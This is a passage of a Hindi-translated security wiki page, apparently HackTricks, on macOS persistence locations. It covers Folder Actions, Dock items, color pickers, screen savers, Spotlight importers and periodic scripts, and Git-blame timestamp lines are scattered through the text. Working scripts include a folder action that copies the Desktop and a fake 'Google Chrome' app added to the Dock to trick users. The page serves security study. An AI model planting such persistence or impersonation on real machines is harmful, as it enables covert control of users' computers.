var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
```
2024-09-21 18:25:44 +00:00
Folder Actions के द्वारा उपरोक्त स्क्रिप्ट को उपयोगी बनाने के लिए, इसे निम्नलिखित का उपयोग करके संकलित करें:
2024-02-07 07:34:51 +00:00
```bash
osacompile -l JavaScript -o folder.scpt source.js
```
2024-09-21 18:25:44 +00:00
स्क्रिप्ट संकलित होने के बाद, नीचे दिए गए स्क्रिप्ट को निष्पादित करके फ़ोल्डर क्रियाएँ सेट करें। यह स्क्रिप्ट वैश्विक रूप से फ़ोल्डर क्रियाओं को सक्षम करेगी और विशेष रूप से पूर्व में संकलित स्क्रिप्ट को डेस्कटॉप फ़ोल्डर से जोड़ देगी।
2023-09-28 15:09:34 +00:00
```javascript
2024-02-07 07:34:51 +00:00
// Enabling and attaching Folder Action
2023-09-28 15:09:34 +00:00
var se = Application("System Events");
se.folderActionsEnabled = true;
var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
se.folderActions.push(fa);
fa.scripts.push(myScript);
```
2024-09-21 18:25:44 +00:00
setup स्क्रिप्ट चलाएँ:
2024-02-07 07:34:51 +00:00
```bash
osascript -l JavaScript /Users/username/attach.scpt
```
2024-09-21 18:25:44 +00:00
* यह GUI के माध्यम से इस स्थिरता को लागू करने का तरीका है:
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
यह स्क्रिप्ट है जो निष्पादित की जाएगी:
2023-09-28 15:09:34 +00:00
{% code title="source.js" %}
```applescript
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
```
{% endcode %}
2024-09-21 18:25:44 +00:00
इसे संकलित करें: `osacompile -l JavaScript -o folder.scpt source.js`
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
इसे स्थानांतरित करें:
2023-09-28 15:09:34 +00:00
```bash
mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
```
2024-09-21 18:25:44 +00:00
फिर, `Folder Actions Setup` ऐप खोलें, **फोल्डर जिसे आप देखना चाहते हैं** का चयन करें और आपके मामले में ** `folder.scpt` ** का चयन करें (मेरे मामले में मैंने इसे output2.scp कहा):
2023-09-28 15:09:34 +00:00
2024-07-17 18:49:06 +00:00
< figure > < img src = "../.gitbook/assets/image (39).png" alt = "" width = "297" > < figcaption > < / figcaption > < / figure >
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
अब, यदि आप उस फोल्डर को **Finder** के साथ खोलते हैं, तो आपका स्क्रिप्ट निष्पादित होगा।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
यह कॉन्फ़िगरेशन **plist** में संग्रहीत था जो ** `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist` ** में base64 प्रारूप में है।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
अब, चलिए बिना GUI एक्सेस के इस स्थिरता को तैयार करने की कोशिश करते हैं:
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
1. ** `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist` ** को `/tmp` में बैकअप के लिए कॉपी करें:
2024-02-23 17:48:00 +00:00
* `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp`
2024-09-21 18:25:44 +00:00
2. आपने जो Folder Actions सेट किए हैं उन्हें **हटाएं** :
2023-09-28 15:09:34 +00:00
2024-07-17 18:49:06 +00:00
< figure > < img src = "../.gitbook/assets/image (40).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-09-28 15:09:34 +00:00
2024-07-18 18:53:16 +00:00
अब जब हमारे पास एक खाली वातावरण है
2023-09-28 15:09:34 +00:00
2024-07-18 18:53:16 +00:00
3. बैकअप फ़ाइल कॉपी करें: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/`
2024-09-21 18:25:44 +00:00
4. इस कॉन्फ़िगरेशन का उपयोग करने के लिए Folder Actions Setup.app खोलें: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"`
2023-09-28 15:09:34 +00:00
{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
और यह मेरे लिए काम नहीं किया, लेकिन ये लिखावट से निर्देश हैं:(
2023-09-28 15:09:34 +00:00
{% endhint %}
2024-09-21 18:25:44 +00:00
### डॉक शॉर्टकट
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
लिखावट: [https://theevilbit.github.io/beyond/beyond\_0027/ ](https://theevilbit.github.io/beyond/beyond\_0027/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* लेकिन आपको सिस्टम के अंदर एक दुर्भावनापूर्ण एप्लिकेशन स्थापित करना होगा
2023-12-30 01:27:36 +00:00
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:05:35 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
* `~/Library/Preferences/com.apple.dock.plist`
2024-02-07 07:34:51 +00:00
* **ट्रिगर**: जब उपयोगकर्ता डॉक के अंदर ऐप पर क्लिक करता है
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### विवरण और शोषण
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
सभी एप्लिकेशन जो डॉक में दिखाई देते हैं, उन्हें plist में निर्दिष्ट किया गया है: ** `~/Library/Preferences/com.apple.dock.plist` **
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
आप केवल निम्नलिखित के साथ **एक एप्लिकेशन जोड़ना** संभव है:
2024-07-17 18:49:06 +00:00
{% code overflow="wrap" %}
2023-09-28 15:09:34 +00:00
```bash
# Add /System/Applications/Books.app
defaults write com.apple.dock persistent-apps -array-add '< dict > < key > tile-data< / key > < dict > < key > file-data< / key > < dict > < key > _CFURLString< / key > < string > /System/Applications/Books.app< / string > < key > _CFURLStringType< / key > < integer > 0< / integer > < / dict > < / dict > < / dict > '
# Restart Dock
killall Dock
```
{% endcode %}
2024-09-21 18:25:44 +00:00
कुछ **सोशल इंजीनियरिंग** का उपयोग करके आप **उदाहरण के लिए Google Chrome** की नकल कर सकते हैं डॉक के अंदर और वास्तव में अपना खुद का स्क्रिप्ट चला सकते हैं:
2023-09-28 21:12:41 +00:00
```bash
#!/bin/sh
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
# Payload to execute
echo '#!/bin/sh
open /Applications/Google\ Chrome.app/ &
touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
# Info.plist
cat < < EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
< !DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
2023-11-06 08:38:02 +00:00
< key > CFBundleExecutable< / key >
< string > Google Chrome< / string >
< key > CFBundleIdentifier< / key >
< string > com.google.Chrome< / string >
< key > CFBundleName< / key >
< string > Google Chrome< / string >
< key > CFBundleVersion< / key >
< string > 1.0< / string >
< key > CFBundleShortVersionString< / key >
< string > 1.0< / string >
< key > CFBundleInfoDictionaryVersion< / key >
< string > 6.0< / string >
< key > CFBundlePackageType< / key >
< string > APPL< / string >
< key > CFBundleIconFile< / key >
< string > app< / string >
2023-09-28 21:12:41 +00:00
< / dict >
< / plist >
EOF
# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '< dict > < key > tile-data< / key > < dict > < key > file-data< / key > < dict > < key > _CFURLString< / key > < string > /tmp/Google Chrome.app< / string > < key > _CFURLStringType< / key > < integer > 0< / integer > < / dict > < / dict > < / dict > '
killall Dock
```
2024-09-21 18:25:44 +00:00
### Color Pickers
2023-09-28 21:12:41 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0017 ](https://theevilbit.github.io/beyond/beyond\_0017/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [🟠 ](https://emojipedia.org/large-orange-circle )
2024-02-07 07:34:51 +00:00
* एक बहुत विशिष्ट क्रिया होनी चाहिए
2024-09-21 18:25:44 +00:00
* आप एक और सैंडबॉक्स में समाप्त होंगे
2023-12-30 01:27:36 +00:00
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### Location
2023-09-28 15:09:34 +00:00
2024-02-07 07:34:51 +00:00
* `/Library/ColorPickers`
2023-12-30 01:27:36 +00:00
* रूट की आवश्यकता है
2024-09-21 18:25:44 +00:00
* ट्रिगर: रंग पिकर का उपयोग करें
2023-09-28 15:09:34 +00:00
* `~/Library/ColorPickers`
2024-09-21 18:25:44 +00:00
* ट्रिगर: रंग पिकर का उपयोग करें
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
#### Description & Exploit
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
**अपने कोड के साथ एक रंग पिकर** बंडल संकलित करें (आप [**इसका उदाहरण ले सकते हैं** ](https://github.com/viktorstrate/color-picker-plus )) और एक कंस्ट्रक्टर जोड़ें (जैसे [स्क्रीन सेवर अनुभाग ](macos-auto-start-locations.md#screen-saver ) में) और बंडल को `~/Library/ColorPickers` में कॉपी करें।
2024-02-08 23:20:46 +00:00
2024-09-21 18:25:44 +00:00
फिर, जब रंग पिकर को ट्रिगर किया जाता है, तो आपका शोर भी होना चाहिए।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
ध्यान दें कि आपकी लाइब्रेरी लोड करने वाला बाइनरी एक **बहुत प्रतिबंधात्मक सैंडबॉक्स** है: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64`
2023-09-28 15:09:34 +00:00
2024-02-08 23:20:46 +00:00
{% code overflow="wrap" %}
2023-09-28 15:09:34 +00:00
```bash
[Key] com.apple.security.temporary-exception.sbpl
2023-11-06 08:38:02 +00:00
[Value]
[Array]
[String] (deny file-write* (home-subpath "/Library/Colors"))
[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
[String] (allow file-read* (extension "com.apple.app-sandbox.read"))
2023-06-01 21:09:46 +00:00
```
2024-02-07 07:34:51 +00:00
{% endcode %}
2024-09-21 18:25:44 +00:00
### Finder Sync Plugins
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0026/ ](https://theevilbit.github.io/beyond/beyond\_0026/ )\
**Writeup**: [https://objective-see.org/blog/blog\_0x11.html ](https://objective-see.org/blog/blog\_0x11.html )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: **नहीं, क्योंकि आपको अपना ऐप चलाना होगा**
2023-12-30 01:27:36 +00:00
* TCC बायपास: ???
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
2024-07-18 18:53:16 +00:00
* एक विशिष्ट ऐप
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
#### विवरण और शोषण
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
एक एप्लिकेशन उदाहरण जिसमें एक Finder Sync Extension [**यहां पाया जा सकता है** ](https://github.com/D00MFist/InSync ).
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
एप्लिकेशन में `Finder Sync Extensions` हो सकते हैं। यह एक्सटेंशन एक एप्लिकेशन के अंदर जाएगा जिसे निष्पादित किया जाएगा। इसके अलावा, एक्सटेंशन को अपना कोड निष्पादित करने के लिए **साइन किया जाना चाहिए** किसी मान्य Apple डेवलपर प्रमाणपत्र के साथ, इसे **सैंडबॉक्स** किया जाना चाहिए (हालांकि ढीले अपवाद जोड़े जा सकते हैं) और इसे कुछ इस तरह से पंजीकृत किया जाना चाहिए:
2023-06-01 21:09:46 +00:00
```bash
2023-09-28 20:05:35 +00:00
pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
pluginkit -e use -i com.example.InSync.InSync
2023-06-01 21:09:46 +00:00
```
2023-11-06 08:38:02 +00:00
### स्क्रीन सेवर
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0016/ ](https://theevilbit.github.io/beyond/beyond\_0016/ )\
Writeup: [https://posts.specterops.io/saving-your-access-d562bf5bf90b ](https://posts.specterops.io/saving-your-access-d562bf5bf90b )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [🟠 ](https://emojipedia.org/large-orange-circle )
* लेकिन आप एक सामान्य एप्लिकेशन सैंडबॉक्स में समाप्त होंगे
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
2024-02-07 07:34:51 +00:00
* `/System/Library/Screen Savers`
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
2023-11-06 08:38:02 +00:00
* **ट्रिगर**: स्क्रीन सेवर का चयन करें
2023-09-28 15:09:34 +00:00
* `/Library/Screen Savers`
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
2023-11-06 08:38:02 +00:00
* **ट्रिगर**: स्क्रीन सेवर का चयन करें
2023-09-28 15:09:34 +00:00
* `~/Library/Screen Savers`
2023-11-06 08:38:02 +00:00
* **ट्रिगर**: स्क्रीन सेवर का चयन करें
2023-09-28 15:09:34 +00:00
2024-07-17 18:49:06 +00:00
< figure > < img src = "../.gitbook/assets/image (38).png" alt = "" width = "375" > < figcaption > < / figcaption > < / figure >
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
#### विवरण और शोषण
Xcode में एक नया प्रोजेक्ट बनाएं और एक नया **स्क्रीन सेवर** बनाने के लिए टेम्पलेट का चयन करें। फिर, इसमें अपना कोड जोड़ें, उदाहरण के लिए लॉग उत्पन्न करने के लिए निम्नलिखित कोड।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
**बिल्ड** करें, और `.saver` बंडल को ** `~/Library/Screen Savers` ** में कॉपी करें। फिर, स्क्रीन सेवर GUI खोलें और यदि आप बस उस पर क्लिक करते हैं, तो यह बहुत सारे लॉग उत्पन्न करना चाहिए:
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
{% code overflow="wrap" %}
2023-09-28 15:09:34 +00:00
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'
Timestamp (process)[PID]
2023-09-27 22:55:39.622369+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char ** )
2023-09-27 22:55:39.622623+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
2023-09-27 22:55:39.622704+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]
```
{% endcode %}
{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
ध्यान दें कि इस कोड को लोड करने वाले बाइनरी के अधिकारों के अंदर (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) आप ** `com.apple.security.app-sandbox` ** पा सकते हैं, आप **सामान्य एप्लिकेशन सैंडबॉक्स के अंदर** होंगे।
2023-09-28 15:09:34 +00:00
{% endhint %}
2024-07-18 18:53:16 +00:00
Saver code:
2023-09-28 15:09:34 +00:00
```objectivec
//
// ScreenSaverExampleView.m
// ScreenSaverExample
//
// Created by Carlos Polop on 27/9/23.
//
#import "ScreenSaverExampleView.h"
@implementation ScreenSaverExampleView
- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
{
2023-11-06 08:38:02 +00:00
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
self = [super initWithFrame:frame isPreview:isPreview];
if (self) {
[self setAnimationTimeInterval:1/30.0];
}
return self;
2023-09-28 15:09:34 +00:00
}
- (void)startAnimation
{
2023-11-06 08:38:02 +00:00
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
[super startAnimation];
2023-09-28 15:09:34 +00:00
}
- (void)stopAnimation
{
2023-11-06 08:38:02 +00:00
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
[super stopAnimation];
2023-09-28 15:09:34 +00:00
}
- (void)drawRect:(NSRect)rect
{
2023-11-06 08:38:02 +00:00
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
[super drawRect:rect];
2023-09-28 15:09:34 +00:00
}
- (void)animateOneFrame
{
2023-11-06 08:38:02 +00:00
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
return;
2023-09-28 15:09:34 +00:00
}
- (BOOL)hasConfigureSheet
{
2023-11-06 08:38:02 +00:00
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
return NO;
2023-09-28 15:09:34 +00:00
}
- (NSWindow*)configureSheet
{
2023-11-06 08:38:02 +00:00
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
return nil;
2023-09-28 15:09:34 +00:00
}
__attribute__((constructor))
void custom(int argc, const char **argv) {
2023-11-06 08:38:02 +00:00
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__ );
2023-09-28 15:09:34 +00:00
}
@end
```
2024-09-21 18:25:44 +00:00
### Spotlight Plugins
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
writeup: [https://theevilbit.github.io/beyond/beyond\_0011/ ](https://theevilbit.github.io/beyond/beyond\_0011/ )
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [🟠 ](https://emojipedia.org/large-orange-circle )
* लेकिन आप एक एप्लिकेशन सैंडबॉक्स में समाप्त होंगे
2023-12-30 01:27:36 +00:00
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स बहुत सीमित लगता है
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
#### Location
2023-10-01 18:04:16 +00:00
* `~/Library/Spotlight/`
2024-09-21 18:25:44 +00:00
* **Trigger**: एक नई फ़ाइल बनाई जाती है जिसमें स्पॉटलाइट प्लगइन द्वारा प्रबंधित एक्सटेंशन होता है।
2023-10-01 18:04:16 +00:00
* `/Library/Spotlight/`
2024-09-21 18:25:44 +00:00
* **Trigger**: एक नई फ़ाइल बनाई जाती है जिसमें स्पॉटलाइट प्लगइन द्वारा प्रबंधित एक्सटेंशन होता है।
* रूट आवश्यक
2023-10-01 18:04:16 +00:00
* `/System/Library/Spotlight/`
2024-09-21 18:25:44 +00:00
* **Trigger**: एक नई फ़ाइल बनाई जाती है जिसमें स्पॉटलाइट प्लगइन द्वारा प्रबंधित एक्सटेंशन होता है।
* रूट आवश्यक
2023-10-01 18:04:16 +00:00
* `Some.app/Contents/Library/Spotlight/`
2024-09-21 18:25:44 +00:00
* **Trigger**: एक नई फ़ाइल बनाई जाती है जिसमें स्पॉटलाइट प्लगइन द्वारा प्रबंधित एक्सटेंशन होता है।
* नई ऐप आवश्यक
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
#### Description & Exploitation
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
Spotlight macOS की अंतर्निहित खोज सुविधा है, जिसे उपयोगकर्ताओं को **अपने कंप्यूटर पर डेटा तक त्वरित और व्यापक पहुंच प्रदान करने के लिए डिज़ाइन किया गया है** ।\
इस त्वरित खोज क्षमता को सुविधाजनक बनाने के लिए, Spotlight एक **स्वामित्व डेटाबेस** बनाए रखता है और **अधिकांश फ़ाइलों को पार्स करके** एक अनुक्रमणिका बनाता है, जिससे फ़ाइल नामों और उनके सामग्री के माध्यम से तेज़ खोजें संभव होती हैं।
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
Spotlight का अंतर्निहित तंत्र एक केंद्रीय प्रक्रिया 'mds' नामक है, जिसका अर्थ है ** 'मेटाडेटा सर्वर'।** यह प्रक्रिया पूरी Spotlight सेवा का संचालन करती है। इसके साथ, कई 'mdworker' डेमन होते हैं जो विभिन्न रखरखाव कार्य करते हैं, जैसे विभिन्न फ़ाइल प्रकारों का अनुक्रमण ( `ps -ef | grep mdworker` )। ये कार्य Spotlight आयातक प्लगइनों, या ** ".mdimporter bundles"** के माध्यम से संभव होते हैं, जो Spotlight को विभिन्न फ़ाइल प्रारूपों में सामग्री को समझने और अनुक्रमित करने में सक्षम बनाते हैं।
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
प्लगइन्स या ** `.mdimporter` ** बंडल पहले उल्लेखित स्थानों में स्थित होते हैं और यदि एक नया बंडल प्रकट होता है, तो इसे एक मिनट के भीतर लोड किया जाता है (किसी सेवा को पुनः प्रारंभ करने की आवश्यकता नहीं है)। इन बंडलों को यह संकेत देना आवश्यक है कि वे **कौन से फ़ाइल प्रकार और एक्सटेंशन प्रबंधित कर सकते हैं** , इस तरह, Spotlight उन्हें तब उपयोग करेगा जब एक नई फ़ाइल बनाई जाती है जिसमें निर्दिष्ट एक्सटेंशन होता है।
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
यह संभव है कि **सभी `mdimporters`** को लोड किया गया हो:
2023-10-01 18:04:16 +00:00
```bash
mdimport -L
Paths: id(501) (
2023-11-06 08:38:02 +00:00
"/System/Library/Spotlight/iWork.mdimporter",
"/System/Library/Spotlight/iPhoto.mdimporter",
"/System/Library/Spotlight/PDF.mdimporter",
[...]
2023-10-01 18:04:16 +00:00
```
2024-09-21 18:25:44 +00:00
और उदाहरण के लिए ** /Library/Spotlight/iBooksAuthor.mdimporter** इन प्रकार की फ़ाइलों (एक्सटेंशन `.iba` और `.book` सहित) को पार्स करने के लिए उपयोग किया जाता है:
2023-10-01 18:04:16 +00:00
```json
plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist
[...]
"CFBundleDocumentTypes" => [
2023-11-06 08:38:02 +00:00
0 => {
"CFBundleTypeName" => "iBooks Author Book"
"CFBundleTypeRole" => "MDImporter"
"LSItemContentTypes" => [
0 => "com.apple.ibooksauthor.book"
1 => "com.apple.ibooksauthor.pkgbook"
2 => "com.apple.ibooksauthor.template"
3 => "com.apple.ibooksauthor.pkgtemplate"
]
"LSTypeIsPackage" => 0
}
]
2023-10-01 18:04:16 +00:00
[...]
2023-11-06 08:38:02 +00:00
=> {
"UTTypeConformsTo" => [
0 => "public.data"
1 => "public.composite-content"
]
"UTTypeDescription" => "iBooks Author Book"
"UTTypeIdentifier" => "com.apple.ibooksauthor.book"
"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor"
"UTTypeTagSpecification" => {
"public.filename-extension" => [
0 => "iba"
1 => "book"
]
}
}
2023-10-01 18:04:16 +00:00
[...]
```
{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
यदि आप अन्य `mdimporter` का Plist चेक करते हैं, तो आपको प्रविष्टि ** `UTTypeConformsTo` ** नहीं मिल सकती। इसका कारण यह है कि यह एक अंतर्निहित _Uniform Type Identifiers_ ([UTI](https://en.wikipedia.org/wiki/Uniform\_Type\_Identifier)) है और इसे एक्सटेंशन निर्दिष्ट करने की आवश्यकता नहीं है।
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
इसके अलावा, सिस्टम डिफ़ॉल्ट प्लगइन्स हमेशा प्राथमिकता लेते हैं, इसलिए एक हमलावर केवल उन फ़ाइलों तक पहुँच सकता है जो अन्यथा एप्पल के अपने `mdimporters` द्वारा अनुक्रमित नहीं हैं।
2023-10-01 18:04:16 +00:00
{% endhint %}
2024-09-21 18:25:44 +00:00
अपने स्वयं के आयातक को बनाने के लिए, आप इस प्रोजेक्ट से शुरू कर सकते हैं: [https://github.com/megrimm/pd-spotlight-importer ](https://github.com/megrimm/pd-spotlight-importer ) और फिर नाम, ** `CFBundleDocumentTypes` ** को बदलें और ** `UTImportedTypeDeclarations` ** जोड़ें ताकि यह उस एक्सटेंशन का समर्थन करे जिसे आप समर्थन करना चाहते हैं और उन्हें ** `schema.xml` ** में परिलक्षित करें।\
फिर ** `GetMetadataForFile` ** फ़ंक्शन के कोड को **बदलें** ताकि जब एक फ़ाइल बनाई जाए जिसमें संसाधित एक्सटेंशन हो, तो आपका पेलोड निष्पादित हो।
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
अंत में, **अपना नया `.mdimporter` बनाएं और कॉपी करें** और इसे पिछले स्थानों में से एक में रखें और आप यह चेक कर सकते हैं कि यह कब लोड होता है **लॉग की निगरानी करके** या ** `mdimport -L.` ** चेक करके।
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
### ~~Preference Pane~~
2023-06-01 21:09:46 +00:00
2023-09-28 20:05:35 +00:00
{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
यह अब काम करता हुआ नहीं लगता।
2023-09-28 20:05:35 +00:00
{% endhint %}
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0009/ ](https://theevilbit.github.io/beyond/beyond\_0009/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [🟠 ](https://emojipedia.org/large-orange-circle )
* इसे एक विशिष्ट उपयोगकर्ता क्रिया की आवश्यकता है
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
* **`/System/Library/PreferencePanes`**
* **`/Library/PreferencePanes`**
* **`~/Library/PreferencePanes`**
2023-06-01 21:09:46 +00:00
2023-11-06 08:38:02 +00:00
#### विवरण
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
यह अब काम करता हुआ नहीं लगता।
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
## रूट सैंडबॉक्स बायपास
2023-06-01 21:09:46 +00:00
2023-09-28 20:05:35 +00:00
{% hint style="success" %}
2024-09-21 18:25:44 +00:00
यहां आप **सैंडबॉक्स बायपास** के लिए उपयोगी प्रारंभ स्थान पा सकते हैं जो आपको **फाइल में लिखकर** कुछ निष्पादित करने की अनुमति देता है, **रूट** होने पर और/या अन्य **अजीब शर्तों** की आवश्यकता होती है।
2023-09-28 20:05:35 +00:00
{% endhint %}
2023-09-28 15:09:34 +00:00
2024-02-07 07:34:51 +00:00
### आवधिक
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0019/ ](https://theevilbit.github.io/beyond/beyond\_0019/ )
2023-09-26 23:39:35 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [🟠 ](https://emojipedia.org/large-orange-circle )
* लेकिन आपको रूट होना चाहिए
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-26 23:39:35 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-26 23:39:35 +00:00
2023-09-28 20:05:35 +00:00
* `/etc/periodic/daily` , `/etc/periodic/weekly` , `/etc/periodic/monthly` , `/usr/local/etc/periodic`
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
* **ट्रिगर**: जब समय आए
2023-11-06 08:38:02 +00:00
* `/etc/daily.local` , `/etc/weekly.local` या `/etc/monthly.local`
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
* **ट्रिगर**: जब समय आए
2023-06-01 21:09:46 +00:00
2023-11-06 08:38:02 +00:00
#### विवरण और शोषण
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
